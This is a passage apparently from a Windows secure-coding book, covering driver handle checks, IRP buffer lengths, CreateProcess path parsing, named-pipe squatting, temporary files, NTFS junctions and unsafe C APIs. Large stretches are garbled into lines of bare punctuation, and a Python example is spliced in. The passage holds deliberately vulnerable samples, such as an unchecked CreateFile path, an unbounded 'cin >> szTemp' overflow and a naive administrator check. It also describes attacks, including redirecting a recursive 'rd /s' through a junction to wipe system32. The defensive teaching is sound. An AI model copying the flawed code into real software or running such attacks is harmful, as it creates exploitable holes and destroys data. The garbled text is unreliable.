Handles and kernel objects. Handles a driver creates go into the current process's handle table unless you say otherwise, where a user-mode thread can use them or close them; create them with OBJ_KERNEL_HANDLE, which keeps them out of every process table. A handle passed in by the user belongs to the user: validate it with ObReferenceObjectByHandle, specifying the object type you expect and UserMode as the access mode, so that a handle to the wrong kind of object, or one the caller does not have the right access to, is rejected. Be careful with the Zw* functions (ZwSignalAndWaitForSingleObject, for example): called from kernel mode, they treat the handle as a kernel-mode handle and skip the access check, so passing a user-supplied handle to one of them throws away the protection that previous-mode checking gives you. This previous-mode mechanism is how Windows NT keeps user requests honest; do not bypass it by accident.

Memory and synchronization. Allocate pool charged to the caller with ExAllocatePoolWithQuotaTag, and wrap the call in try/except, since it raises an exception on failure instead of returning NULL. Guard shared data with spin locks (KeAcquireSpinLock) or the interlocked list routines (ExInterlockedInsertHeadList and relatives), and check the lock ordering for deadlocks. Remember what DISPATCH_LEVEL IRQL forbids: code running there cannot touch paged memory or wait, and a driver that does either crashes the machine, which is a denial of service any local user can trigger if the path is reachable.

User-mode memory. Never touch a user-mode address directly. Probe it with ProbeForRead or ProbeForWrite inside try/except, or lock it with MmProbeAndLockPages (which builds an MDL), and copy the values you validate into kernel memory before using them: a user buffer can be unmapped or changed by another thread at any moment, so a value checked in place and read again later is not the value you checked.
I/O buffers. How the buffer reaches you depends on the I/O method. Buffered I/O: Irp->MdlAddress is NULL and Irp->AssociatedIrp.SystemBuffer is a kernel copy of the user's data. Direct I/O: Irp->MdlAddress describes the user's pages, locked for the duration. Neither (METHOD_NEITHER): Irp->UserBuffer is a raw user-mode pointer, valid only in the caller's context, which must be probed as described above and captured before use.

For all three the driver, not Windows, is responsible for lengths. When you complete an IRP, set Irp->IoStatus.Information to the number of bytes you actually wrote, and Irp->IoStatus.Status to a matching status. For buffered I/O the I/O manager copies Information bytes back to the user, so a value larger than the buffer length in IoStack->Parameters.Read.Length (or the equivalent for the request) copies kernel memory to the caller. Check structure sizes too: if the caller passed 4 bytes and you write an 8-byte structure you have overrun the buffer, and if you expect 8 bytes and received 4 you must not read the missing half. The status matters as well: a warning status (0x80000000 through 0xBFFFFFFF, such as STATUS_BUFFER_OVERFLOW) still completes the copy, while an error status (0xC0000000 through 0xFFFFFFFF, such as STATUS_BUFFER_TOO_SMALL) does not, so choose the one that matches what you wrote.

Memory descriptor lists (MDLs) describe user memory locked for the I/O. That memory is still mapped in the user's process: the user can read it while you work, so do not stage data the caller is not entitled to see in a buffer the caller owns, and do not assume the contents cannot change underneath you unless you have copied them.
IRP cancellation. Every IRP a driver queues must be cancellable, and the driver must handle IRP_MJ_CLEANUP when the handle is closed; otherwise a process that exits with I/O outstanding can hang, or the IRP completes later into a buffer that no longer exists. Cancellation is race-prone, because the cancel routine and the dispatch or completion path run concurrently, so use the cancel-safe queue routines, IoCsqXxxx, declared in CSQ.H, rather than writing your own queue. If you use a StartIo routine, IoSetStartIoAttributes with NonCancellable set to TRUE (available from Windows XP) tells the I/O manager not to cancel an IRP while StartIo holds it, which removes one of the races.
:
?
?
.
. ( ,
, ).
// The classic mistake: szParam came from the user (a command-line
// argument, a form field, a message) and is passed to CreateFile
// without any check on what it names.
HANDLE hFile = CreateFile(szParam,
                          GENERIC_READ,
                          FILE_SHARE_READ,
                          NULL,
                          OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL);
if (hFile != INVALID_HANDLE_VALUE) {
    // Use the file.
}
,
.
,
. ,
, ,
. , ,
.
,
,
. :
.
,
, .
,
, .
,
.
. .
X.509 Microsoft Internet Explorer 5:
(. 231).
. 231.
Internet Explorer 5
, ,
: !
, ! ,
, No ,
Yes .
, Yes, . ,
: ,
, .
Calling CreateProcess safely

Which should you use: CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, ShellExecute or WinExec? Whichever fits, but all of them take a command line, and the way CreateProcess parses it is a trap. CreateProcess has two string arguments, lpApplicationName and lpCommandLine. The Platform SDK says that if lpApplicationName is NULL, the program to run is the first white-space-delimited token of lpCommandLine; and because file names may contain spaces, the system tries each prefix in turn until one is an executable that exists. Given

CreateProcess(NULL,
              "C:\\Program Files\\MyDir\\MyApp.exe -p -a",
              ...);

it first tries C:\Program, then C:\Program Files\MyDir\MyApp.exe, and so on. An attacker who can create C:\Program.exe gets it run instead, with whatever privilege the caller has. (NULL in lpApplicationName is common because it is the way to have the command line searched for the program rather than naming it.) Either pass the full path in lpApplicationName:

CreateProcess("C:\\Program Files\\MyDir\\MyApp.exe",
              "MyApp.exe -p -a",
              ...);

or, if lpApplicationName must be NULL, quote the program path in lpCommandLine so that the spaces are not treated as separators:

CreateProcess(NULL,
              "\"C:\\Program Files\\MyDir\\MyApp.exe\" -p -a",
              ...);
Shared memory sections in DLLs

How can code running as one user reach code running as another without going through any check at all? Through a shared section. A module can declare a section that is shared across every process that loads it, either in the .def file:

SECTIONS
  .dangersec READ WRITE SHARED

or with a linker directive placed in a .h or .c file:

#pragma comment(linker, "/SECTION:.dangersec,RWS")

(see the Knowledge Base article HOWTO: Share Data Between Different Mappings of a DLL). Windows has supported this since the 16-bit days, and it is dangerous for the same reason a world-writable file is: any process that loads the DLL, however unprivileged, can write to the section, and a privileged process that reads the data will trust it. If a SYSTEM service and a user's process both load the DLL, the user decides what the service sees, and a pointer or a length in that data becomes an exploit. Use a named file mapping created with CreateFileMapping and an explicit security descriptor instead, so that you, not the loader, decide who may write.
\Program Files
7, , , .
\Program Files , ACE
,
.
.
, : %<_
>%\My Documents, .
, \Documents
Settings\All Users\Application Data\<_>.
\Program Files ,
, Windows 95 Windows NT ,
, .
HKEY_LOCAL_MACHINE ; .
HKLM
\Program Files, HKEY_LOCAL_MACHINE
, ACL
[ Everyone ()]
.
HKEY_CURRENT_USER, .
Don't ask for FULL_CONTROL or ALL_ACCESS

Windows has had fine-grained access rights since Windows NT 3.1 in 1993, and asking for everything is what lets one bug become a compromise. Open objects with the access you need and no more; if the code only reads, request read. The same applies to the ACLs you grant: FULL_CONTROL to Everyone is never the right answer, whatever the deadline.

Name squatting

Functions named Create... are often also Open...: CreateNamedPipe, CreateMutex and CreateFileMapping return a handle to an existing object of the same name if there is one (or, for pipes, create another instance of an existing pipe). If an attacker can predict the name, he can create the object first, with an ACL of his choosing, and your code then uses his object: it reads his data, or he reads yours, and the ACL you meant to set never comes into play. Microsoft's Telnet service had exactly this bug. It created a named pipe with a predictable name; a local user who created the pipe first received the service's connection and could run code in its context (Predictable Name Pipes Could Enable Privilege Elevation via Telnet, http://www.microsoft.com/technet/security/bulletin/MS01031.asp). The defences: use unpredictable names where the name does not need to be known in advance; where it must be known, create the object in a way that fails if it already exists, and check the failure. For named pipes that is what FILE_FLAG_FIRST_PIPE_INSTANCE is for:
#include <windows.h>
#include <stdio.h>

#ifndef FILE_FLAG_FIRST_PIPE_INSTANCE
# define FILE_FLAG_FIRST_PIPE_INSTANCE 0x00080000
#endif

bool CreatePipeIfNotSquatted()
{
    bool fCreatedOk = false;
    HANDLE hPipe = CreateNamedPipe("\\\\.\\pipe\\MyCoolPipe",
                                   PIPE_ACCESS_INBOUND | FILE_FLAG_FIRST_PIPE_INSTANCE,
                                   PIPE_TYPE_BYTE,
                                   1,                        // at most one instance
                                   2048,                     // output buffer size
                                   2048,                     // input buffer size
                                   NMPWAIT_USE_DEFAULT_WAIT,
                                   NULL);                    // default security descriptor;
                                                             // set a real one in production
    if (hPipe != INVALID_HANDLE_VALUE) {
        // We created the first instance, so nobody got there before us.
        // Close it for now; the real server would keep it and listen.
        CloseHandle(hPipe);
        fCreatedOk = true;
    } else {
        printf("CreateNamedPipe failed, error %d\n", GetLastError());
    }
    return fCreatedOk;
}
Two notes on FILE_FLAG_FIRST_PIPE_INSTANCE. If an instance of the pipe already exists, CreateNamedPipe fails and GetLastError returns ERROR_ACCESS_DENIED: that is the squatting case, and the code must treat it as an attack, not retry. The flag is supported on Windows 2000 with a service pack applied (the text says SP 1; current Microsoft documentation says SP 2) and on Windows XP; on earlier systems the call fails with ERROR_INVALID_PARAMETER, so a server that must run there needs a different defence, such as an unpredictable name.
.
,
DoS.
, ,
. ,
, .
CreateFile opens more than files

The Win32 CreateFile function opens files, but also directories, devices, mailslots, named pipes and consoles; a name that looks like a file may be none of these. If the name comes from an attacker, he can point it at a named pipe he created, and because opening a pipe connects to its server, the attacker's server is now talking to your code and may try to impersonate you at a level of his choosing. Two defences. First, after opening, check with GetFileType that you got the kind of object you expected, and refuse to continue if not. Second, whenever the name may be attacker-controlled, limit what a pipe server can do with your identity by passing SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION in dwFlagsAndAttributes; with that quality of service the server can learn who you are but cannot act as you.
Creating temporary files safely

Temporary files are a classic problem on UNIX, where /tmp is shared and world-writable, and Windows has the same issue wherever the temporary directory is shared between users. Two examples. MandrakeUpdate in Linux-Mandrake wrote to predictable file names in /tmp, so a local user could create them first as symbolic links and have the tool overwrite files of the attacker's choosing (http://www.securityfocus.com/bid/1567). XFree86 4.0.1 had a similar /tmp race (http://www.securityfocus.com/bid/1430). A temporary file is safe only if three things hold:

its name is unpredictable, so an attacker cannot create it first;

creation fails if a file of that name already exists, instead of opening whatever the attacker put there;

the file is created with permissions that exclude other users, in a directory those users cannot tamper with.
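The three requirements above are easy to state and easy to get wrong in the other order (open first, check afterwards). The following Python module, added here as an example and not code from the book, is the POSIX counterpart of the Windows code that follows: `unsafe_temp_path` shows the predictable naming the MandrakeUpdate and XFree86 bugs relied on, and `create_private_temp_file` meets all three requirements in a single open call. It assumes a POSIX system (it uses os.getuid); the names are this example's own.

```python
"""Create a temporary file an attacker cannot pre-create or redirect.

Added example (not from the book): the POSIX counterpart of the
GetTempPath/GetTempFileName/CreateFile advice that follows. The
`unsafe_temp_path` function shows the predictable naming the MandrakeUpdate
and XFree86 bugs above relied on; `create_private_temp_file` meets the
three requirements just listed: unpredictable name, creation that fails if
the name already exists, and permissions that exclude other users.
POSIX only (os.getuid); the names are this example's own.
"""
import os
import secrets
import stat
import tempfile
from typing import Optional, Tuple


def unsafe_temp_path(prefix: str = "myapp") -> str:
    """The classic mistake: a name anyone can guess and create first (as a symlink, say)."""
    return os.path.join(tempfile.gettempdir(), f"{prefix}.{os.getpid()}")


def create_private_temp_file(prefix: str = "myapp",
                             directory: Optional[str] = None) -> Tuple[int, str]:
    """Return (fd, path) for a new file that only this user can read or write.

    O_EXCL turns "the name already exists" into FileExistsError instead of
    opening whatever is there; O_NOFOLLOW refuses a symlink at the path
    outright; the explicit 0o600 mode leaves no window in which the default
    umask makes the file readable by others; O_CLOEXEC keeps the descriptor
    from leaking into child processes.
    """
    directory = directory or tempfile.gettempdir()
    flags = (os.O_RDWR | os.O_CREAT | os.O_EXCL
             | getattr(os, "O_NOFOLLOW", 0) | getattr(os, "O_CLOEXEC", 0))
    # 128 bits of randomness: not guessable, unlike a PID or a counter.
    path = os.path.join(directory, f"{prefix}.{secrets.token_hex(16)}")
    fd = os.open(path, flags, 0o600)
    return fd, path


def file_is_private(path: str) -> bool:
    """True if path is a regular file (not a symlink), mode 0600, owned by this user."""
    st = os.lstat(path)
    return (stat.S_ISREG(st.st_mode)
            and stat.S_IMODE(st.st_mode) == 0o600
            and st.st_uid == os.getuid())


def self_check(prefix: str = "wsc2demo") -> dict:
    """Create a file, confirm the three properties, and clean up."""
    fd, path = create_private_temp_file(prefix)
    results = {"private": False, "exclusive": False,
               "name_len": len(os.path.basename(path))}
    try:
        os.write(fd, b"scratch data")
        results["private"] = file_is_private(path)
        try:
            # A second exclusive create of the same name must fail: that is
            # what stops an attacker from handing us a file they prepared.
            os.close(os.open(path, os.O_RDWR | os.O_CREAT | os.O_EXCL, 0o600))
        except FileExistsError:
            results["exclusive"] = True
    finally:
        os.close(fd)
        os.unlink(path)
    return results


if __name__ == "__main__":
    print("predictable:", unsafe_temp_path())
    print(self_check())
```

Note that the checks happen on the descriptor and the path you created in one step; checking a path and then opening it is the race the two bulletins describe.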
On Windows, use GetTempPath and GetTempFileName. GetTempPath returns the directory named by the TMP or TEMP environment variable, which on Windows 2000 and later is per user; GetTempFileName creates a uniquely named, zero-length file in it. Neither sets an ACL: the file inherits the directory's, so if the temporary directory is shared (C:\Temp, for example) other users may be able to read or replace it. Windows XP gives the LocalService and NetworkService accounts their own temporary directories, so services running as those accounts do not share one with interactive users. GetTempFileName's names are not unpredictable (a prefix plus a hexadecimal counter), so the safety comes from the file being created, not from the name: create it and keep it open, rather than taking the name and creating the file later. The following code (see Secureco2\Chapter23\CreatTempFile) does that and also asks for the file to be deleted when the last handle closes.
#include <windows.h>

HANDLE CreateTempFile(LPCTSTR szPrefix) {
    // Get the temporary directory (TMP or TEMP).
    TCHAR szDir[MAX_PATH];
    DWORD cch = GetTempPath(sizeof(szDir) / sizeof(TCHAR), szDir);
    if (cch == 0 || cch > sizeof(szDir) / sizeof(TCHAR))
        return NULL;

    // Get a unique file name in it (this also creates the file).
    TCHAR szFileName[MAX_PATH];
    if (!GetTempFileName(szDir, szPrefix, 0, szFileName))
        return NULL;

    // Open it: no sharing, default security (inherited from the directory),
    // delete when the last handle closes.
    HANDLE hTemp = CreateFile(szFileName,
                              GENERIC_READ | GENERIC_WRITE,
                              0,                        // no sharing
                              NULL,                     // default security
                              CREATE_ALWAYS,
                              FILE_ATTRIBUTE_TEMPORARY |
                              FILE_FLAG_DELETE_ON_CLOSE,
                              NULL);
    return hTemp == INVALID_HANDLE_VALUE
           ? NULL
           : hTemp;
}

int main() {
    HANDLE h = CreateTempFile(TEXT("tmp"));
    if (h) {
        //
        // Use the temporary file here.
        //
        CloseHandle(h);   // the file is deleted at this point
    }
    return 0;
}
The CreateFile flags matter; Table 23-1 explains them.

Table 23-1. CreateFile flags used in CreateTempFile

CREATE_ALWAYS: creates the file; if a file of that name already exists, it is truncated and overwritten, so contents planted by another user are discarded. CREATE_NEW is stricter (it fails if the file exists) and is the better choice when you can handle the failure.
FILE_ATTRIBUTE_TEMPORARY: a hint to keep the file's data in the cache; it is unlikely to be written to disk at all if it is short-lived.
FILE_FLAG_DELETE_ON_CLOSE: the file is deleted when the last handle to it is closed, so it cannot be left behind for someone else to read.

Two side effects of FILE_FLAG_DELETE_ON_CLOSE are worth knowing. A file opened with it cannot be moved with MoveFile. And if the Indexing Service indexes the directory, it may hold a handle to the file briefly, delaying the deletion; clearing "For fast searching, allow Indexing Service to index this folder" in the folder's properties avoids that (Figure 23-2).
. 232.
, ,
,
. , CryptoAPI (.
Secureco2\Chapter23\CreateRandomPrefix).
// CreateRandomPrefix.cpp
#include <windows.h>
#include <wincrypt.h>

#define PREFIX_SIZE (3)

// Fill szPrefix (at least PREFIX_SIZE + 1 TCHARs) with random characters
// from a fixed alphabet, using CryptoAPI rather than rand().
DWORD GetRandomPrefix(TCHAR *szPrefix) {
    HCRYPTPROV hProv = NULL;
    DWORD dwErr = 0;
    TCHAR *szValues =
        TEXT("abcdefghijklmnopqrstuvwxyz0123456789");

    // CRYPT_VERIFYCONTEXT: no key container needed, we only want random bytes.
    if (CryptAcquireContext(&hProv,
                            NULL, NULL,
                            PROV_RSA_FULL,
                            CRYPT_VERIFYCONTEXT) == FALSE)
        return GetLastError();

    size_t cbValues = lstrlen(szValues);
    for (int i = 0; i < PREFIX_SIZE; i++) {
        DWORD dwTemp;
        if (!CryptGenRandom(hProv, sizeof(dwTemp), (LPBYTE)&dwTemp)) {
            dwErr = GetLastError();
            break;
        }
        // The modulo introduces a slight bias (36 does not divide 2^32),
        // which is harmless for an unpredictable file name.
        szPrefix[i] = szValues[dwTemp % cbValues];
    }
    szPrefix[PREFIX_SIZE] = '\0';

    if (hProv)
        CryptReleaseContext(hProv, 0);
    return dwErr;
}
EFS
(EFS), ,
Microsoft. ,
, %TEMP%,
.
EFS , ,
. EFS,
:
;
( dwFlagsAnd
Attributes CreateFile FILE_ATTRIBUTE_SYS
TEM);
, %TEMP% ( GetFileAttributes),
.
Beware of NTFS junctions

Windows 2000 introduced NTFS junction points, the equivalent of UNIX symbolic links for directories; Linkd.exe from the Windows Resource Kit creates them. They defeat code that assumes a path stays inside a tree. Suppose an administrator scans every user's directory with findstr /s: a user who creates the junction c:\users\attacker pointing at c:\ sends the scan over the whole disk, including files the user could not read himself. Worse, anything that deletes recursively can be redirected: if c:\temp\tempdir is a junction to c:\windows\system32, then rd /s c:\temp removes the system directory, and a cleanup job running as an administrator will do it for the attacker. Code that walks directory trees, especially with privilege, must check for reparse points before descending. A junction carries the FILE_ATTRIBUTE_REPARSE_POINT attribute, visible through GetFileAttributes or in lpFindFileData->dwFileAttributes from FindFirstFile; do not follow a reparse point unless you mean to.
:
, .
,
.
Web,
DHTML, .
, , Perl
.
, .
, Windows NT Windows XP IP
. ,
TcpIp,
,
. IP
,
IP.
, ,
.
, , (
) .
,
. Microsoft
Visual Studio .NET, , ,
. , .
, ,
.
:
. ,
.
Windows Security Push
, Platform SDK:
Microsoft? : ,
.
!
,
, ,
: . ,
, .
:
. ? ,
,
? , !
,
. ,
,
. ,
.
,
,
,
.
,
, , ,
, .
. ,
C++ C#,
, .
. : , , C++,
COM .NET,
.
SID
, ,
,
,
(SID).
SID . SID,
, ?
#include <windows.h>
#pragma comment(lib, "advapi32.lib")

// Builds the well-known SID for BUILTIN\Administrators. The caller releases
// it with FreeSid.
PSID GetAdminSID() {
    BOOL fSIDCreated = FALSE;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID Admins;
    fSIDCreated = AllocateAndInitializeSid(
        &NtAuthority,
        2,
        SECURITY_BUILTIN_DOMAIN_RID,
        DOMAIN_ALIAS_RID_ADMINS,
        0, 0, 0, 0, 0, 0,
        &Admins);
    return fSIDCreated ? Admins : NULL;
}

// Walks the group list of hToken looking for the Administrators SID. This is
// the naive check discussed in the text: it compares SIDs only and ignores the
// group attributes, so a deny-only Administrators SID (as found in a restricted
// token) still makes it return TRUE. Chapter 7 shows the correct approach.
BOOL IsTokenAdmin(HANDLE hToken) {
    BOOL fIsAnAdmin = FALSE;
    DWORD dwInfoSize = 0;
    PTOKEN_GROUPS ptokgrp = NULL;

    PSID sidAdmin = GetAdminSID();
    if (!sidAdmin) return FALSE;

    // First call reports the buffer size required; the second call fills it.
    GetTokenInformation(hToken, TokenGroups, NULL, 0, &dwInfoSize);
    ptokgrp = (PTOKEN_GROUPS)LocalAlloc(LPTR, dwInfoSize);
    if (ptokgrp &&
        GetTokenInformation(hToken,
                            TokenGroups,
                            ptokgrp,
                            dwInfoSize,
                            &dwInfoSize)) {
        for (DWORD i = 0; i < ptokgrp->GroupCount; i++) {
            if (EqualSid(ptokgrp->Groups[i].Sid, sidAdmin)) {
                fIsAnAdmin = TRUE;
                break;
            }
        }
    }

    if (ptokgrp)
        LocalFree(ptokgrp);
    if (sidAdmin)
        FreeSid(sidAdmin);
    return fIsAnAdmin;
}
Windows 2000
. ,
, , SID
(deny-only SID),
. , TRUE ,
,
SID.
7.
:
Windows, 14 . Windows 2000 14 ,
Windows 2000 256
( NULL).
Windows XP Stored User
Names and Passwords ( ) (. 9).
_alloca
_alloca .
,
.
_alloca.
ATL
ATL, _alloca. A2W, W2A, CW2CT
. ,
. ,
.
ATL 7.0 Visual Studio .NET 2003
, ,
.
:
#include <atlconv.h>
...
// The converter object owns the buffer that holds the converted string, so it
// must stay in scope for as long as the pointer is used; assigning a temporary
// CA2WEX straight to an LPWSTR would leave the pointer dangling.
CA2WEX<64> wszConverted(szString);
LPWSTR szwString = wszConverted;
, C# stackalloc, _alloca.
stackalloc ,
/unsafe, unsafe:
!
, .
,
, .
,
, .
, #ifdef:
#ifdef INTERNAL_USE_ONLY
#  ifndef _DEBUG
#    error ""
#  endif // _DEBUG
   // ""
#endif // INTERNAL_USE_ONLY
:
,
.
,
, :
DNS NetBIOS ;
(,
);
, EXAIR\account account@explorationair.com.
DLL
, , : DLL
? ,
( ,
),
, .
(, ),
, DLL ,
, .
( .rc)
LANGUAGE.
,
.
, , ,
IIS ISA, ,
.
: ,
, .
.
: DNS NetBIOS ,
IP.
IP, , ,
IP ,
, . ,
: IP
, . ,
(NAT) ? IP ,
192.168.0.1. !
IP ,
,
.
Application Log ( )
. ,
, .
: Microsoft Windows .NET
Server 2003
. ACL
.
Application Log
.
,
. :
,
.
,
.
.
, ,
, ,
, .
, , ,
, , .
C/C++
Microsoft
,
C C++, C# . ,
,
. DoS ,
. ,
.
24
,
Microsoft.
:
. , , ,
, ,
.
, , ,
,
!
,
.
, ,
, , , ,
, ,
.
,
.
, ,
,
. , ,
, .
,
, , ,
. , , (,
) , ,
.
, ,
, , .
. , ,
,
,
.
,
,
.
, .
, , .
.
, .
,
, , .
, ,
,
.
.
.
, .
, ,
,
,
.
, . ,
, ,
,
.
.
. ,
.
, , .
. ,
, ,
, .
:
, .
, .
,
API .
,
, ,
API.
,
. ,
( , : ).
,
.
:
, ,
. , ,
.
, .
!
, , ,
, .
( ),
, ,
( ), .
.
,
SOAPServer.
SOAPServer
SOAP.
SOAPServer
.
, (,
).
(,
).
,
.
, SOAP, .
.
SOAPServer
, , .
Encrypt Communications .
TLS SOAPServer
.
, IPSec, TLS.
SOAP. SOAPServer
IP ,
.
.
: ,
,
(ACL) SOAP.
ACL,
Windows .NET Server Access Control List.
SOAPServer TCP 80 (
) 443 ( ).
SOAP ,
TCP
, SOAPServer.
SOAPServer ,
,
, .
,
.
,
. .
.
4: ISOAP_xxx
SOAPServer ISOAP_<_>,
,
. ,
. ,
.
13:
. SSL/TLS,
.
14: SOAP-Server
, SOAPServer
IP DNS. , ,
.
,
.
19:
SOAPServer
Microsoft Windows .NET Server 2003. , :
, SOAPServer .
,
.
, ,
, , .
, , .
, .
?
, ,
, ().
.
,
,
, .
. 241
.
. 241.
, *
, .
, Yes,
No. (. 242),
, . 241.
. 242.
**
? ,
. , Microsoft Internet Explorer
, No.
, ,
, . : ,
. , .
:
, .
,
, .
, .
* :
. . ?
** :
?
, ,
, ,
, .
. . Windows
, ,
.
, ,
.
, , Windows ,
. 243.
. 243. ,
*
,
, . :
( );
(
);
( ,
).
.
, .
Microsoft Windows,
, , .
, Caps Lock**.
,
, .
,
, .
,
,
, .
, ,
* . .
Caps Lock.
* Windows
. . .
.
(. 224) .
. 244.
No,
, . ,
, . ,
, .
. ? Yes?
No?
,
.
, . , .
! ,
No ,
Yes .
, Yes,
. , ,
, .
,
.
(informed consent).
,
,
:
,
;
;
, ;
,
;
, ?
, ;
? ?
.
. ;
,
. ,
,
.
. 245
, .
. 245.
*
* .
, ,
, Acme Incorporated.
Windows ,
Acme Incorporated. ,
, Acme
Incorporated.
Windows
,
. , ,
.
?
Yes, No. . .
, ,
, .
.
,
.
, .
, .
, .
,
, (progressive disclosure). ,
.
,
().
. 246
.
. 246. ,
, .
.
(
, . 241).
, . 241 ,
. ,
(. 247).
. 247.
, ,
, , .
, . , .
, ,
, . ,
,
. , ,
( ),
, .
: ?.
.
, , ,
.
:
, , ,
:
.
,
, ?
,
. ,
. ,
.
* ,
. ,
.
,
.
,
.
? . .
, ,
, ,
. ?
. , ,
.
, Content (
) Internet Options ( ) Internet
Explorer, ,
. Windows Microsoft ,
, .
.
.
Security () Internet
Options Internet Explorer (. 248).
. 248.
,
(,
) , .
,
, .
,
.
.
, ,
,
. ,
. :
;
;
;
;
, , ;
;
;
;
;
?
, ,
.
, . ,
, . ,
,
.
, ,
, , ,
.
,
:
,
;
,
;
,
;
,
, ;
,
;
, ,
.
.
,
,
.
, ,
, ,
.
. Windows XP Windows 2000,
Control Panel ( ) Administrative Tools (
) Local Security Policy (
). ,
( ) .
Local Policies ( ) Security Options (
). , ? ,
Do not Allow Anonymous Enumeration of Accounts and Shares (
) Network
Access ( ). ? ?
?
Help (), Security
Settings ( ),
.
.
, ,
.
, .
. ,
1000 ( ).
.
,
Active Directory,
.
,
.
,
, ,
.
.
, :
. , ,
,
.
,
.
API-
API .
, , ,
,
. , .
5 ,
.
,
.
(Dave Cutler), Microsoft Windows NT,
, ,
. , .
,
. :
, ,
, !
(
) . ,
, ,
.
, .
,
, .
, ,
. ,
, ,
.
! , ,
.
,
.
API-,
C
, .
.
strcpy, wcscpy, lstrcpy, _tcscpy _mbscpy
, null
. ,
.
n ( n) strsafe.
! n strsafe
;
.
strcat, wcscat, lstrcat, _tcscat _mbscat ,
.
strncpy, wcsncpy, _tcsncpy, lstrcpyn _mbsnbcpy ,
.
null .
strncat, wcsncat, _tcsncat _mbsnbcat ,
, , .
,
.
memcpy CopyMemory
, Length.
. _memcpy,
,
.
sprintf swprintf
. ,
.
StringCchPrintf.
_snprintf _snwprintf
. ,
( ) .
StringCchPrintf.
printf printf, _sprintf, _snprintf, vprintf, vsprintf
Unicode. ,
. ,
Unicode %s
,
, .
WideCharToMultiByte.
,
%s (, sprintf(szTemp, "%d, %s", dwData, szString),
, strcpy.
_snprintfI StringCchPrintf.
strlen, _tcslen, _mbslen wcslen
, .
,
, .
gets .
, gets .
! fgets.
getc .
scanf("%s",), _tscanf wscanf gets,
scanf, _tscanf, wscanf %s,
. , , ,
%32s, fgets.
(>>) STL
. ,
. , stdin
(cin) szTemp, 16 ,
.
#include <iostream>
int main(void) {
    char szTemp[16];
    // Unbounded extraction: like gets, this overflows szTemp as soon as the
    // input is longer than 15 characters (plus the terminating null).
    std::cin >> szTemp;
    return 0;
}
, gets.
cin.width.
MultiByteToWideChar ,
Unicode , . ,
. :
WCHAR wszName[NAME_LEN];
MultiByteToWideChar(,,,,sizeof(wszName));
sizeof(wszName)/sizeof(wszName[0])
NAME_LEN, ,
.
_mbsinc, _mbsdec, _mbsncat, _mbsncpy, _mbsnextc, _mbsnset, _mbsrev, _mbsset,
_mbsstr, _mbstok, _mbccpy _mbslen
( )
,
.
/ , isleadbyte, _ismbslead _ismbstrail. _mbbtype.
API-,
CreateDirectory, CreateEvent, CreateFile, CreateFileMapping, CreateHardLink,
CreateJobObject, CreateMailslot, CreateMutex, CreateNamedPipe, CreateSemaphore, CreateWaitableTimer, MoveFile ,
. API, , ,
(namesquatting).
. , ,
, .
,
c:\temp , ,
. , ,
, ,
, , .
,
, Microsoft Windows 2000 Documents and
Settings.
, .
( ) CREATE_NEW ,
, .
, ,
.
. ,
, , !
UNIX
,
Windows. , Windows
, ,
,
(Terminal Services).
, ,
, ,
. ,
.
FILE_FLAG_FIRST_PIPE_INSTANCE.
: Windows 2000 SP1
(. 23).
:
,
, .
, , .
.
.
RPC
,
, . , ,
,
.
API-,
. ,
,
,
.
CreateProcess(NULL,), CreateProcessAsUser CreateProcessWithLogon.
, .
null, ,
. , c:\Program Files\MyApp\MyApp.exe, c:\Program.exe. :
.
WinExec ShellExecute , CreateProcess(NULL,),
.
LoadLibrary, LoadLibraryEx SearchPath Windows
.
DLL, (, file.dll c:\dir\dir\file.dll),
, ,
.
.
: DLL ,
, ,
. DLL
, DLL GetWindowsDirectory.
, .
Windows XP SP1 Windows .NET Server 2003
, .
.
,
(scroll bar). ,
.
, ( ) (hWnd)
SendMessage.
?
TB_GETBUTTONTEXT, LVM_GETISEARCHSTRING TVM_GETISEARCHSTRING ;
, lParam NULL, .
TTM_GETTEXT ;
, 80 .
.
CB_GETLBTEXT, CB_GETLBTEXTLEN, SB_GETTEXT, SB_GETTEXTLENGTH, SB_GETTIPTEXT, LB_GETTEXT LB_GETTEXTLEN
GETTEXTLENGTH, .
:
,
. .
(ToolTip) SB_GETTIPTEXT.
ES_PASSWORD
(). ,
GetWindowText SetWindowText,
. 9.
API-
,
.
,
, SYSTEM .
.
, .
: RpcImpersonateClient, ImpersonateLoggedOnUser, CoImpersonateClient, ImpersonateNamedPipeClient, ImpersonateDdeClientWindow, ImpersonateSecurityContext, ImpersonateAnonymousToken, ImpersonateSelf SetThreadToken.
API-, DoS-
API
, .
InitializeCriticalSection EnterCriticalSection
, ,
. InitializeCriticalSectionAndSpinCount. : EnterCriticalSection Windows XP,
Windows .NET Server . ,
. ,
.
,
LeaveCriticalSection.
. C++
, LeaveCriticalSection
.
_alloca ,
, ,
! ,
, , .
_alloca, , A2OLE, T2W, W2T,
T2COLE, A2W, W2BSTR A2BSTR.
_alloca:
,
.
, _resetstkoflw ;
, . .
#include <malloc.h>
#include <windows.h>
...
int main(int argc, char **argv) {
    __try {
        // A large stack allocation: this may raise STATUS_STACK_OVERFLOW.
        char *p = (char*)_alloca(0xfffff);
        p[0] = 0;
    } __except (GetExceptionCode() == STATUS_STACK_OVERFLOW
                    ? EXCEPTION_EXECUTE_HANDLER
                    : EXCEPTION_CONTINUE_SEARCH) {
        // Restore the stack guard page so that a later overflow is again
        // reported cleanly instead of crashing the process; _resetstkoflw
        // returns 0 if it fails.
        int result = _resetstkoflw();
        if (!result)
            return 1;
    }
    return 0;
}
TerminateThread TerminateProcess
. TerminateThread. ,
, , .
Platform SDK:
TerminateThread ,
. TerminateThread,
,
,
.
TerminateThread
. TerminateProcess
, DLL,
ExitProcess,
. , UNIX: TerminateProcess
, . Win32
.
API-
,
.
, .
, ,
,
TCP.
bind , INADDR_ANY ( )
. 15.
recv ,
. 1,
( ) 0,
. recv
. recv
.
WSAEventSelect. ,
.
send , .
, , send
. connect send.
, TCP
, send
. ,
, .
NetApi32
Windows. :
NetUserGetInfo, NetShareEnum . , .
, , ,
45, . :
SMB (Server Message Block)
, Microsoft, .
, Microsoft
, NULL. ,
,
.
API-
API, .
IsBadReadPtr, IsBadWritePtr, IsBadCodePtr, IsBadStringPtr, IsBadHugeReadPtr
IsBadHugeWritePtr IsBadxxxPtr
: .
16 Windows,
.
NULL.
. , .
,
.
, ,
STATUS_ACCESS_VIOLATION.
, , ,
, !
, , ,
. IsBadWritePtr
. , , ,
. Windows,
.
! ,
.
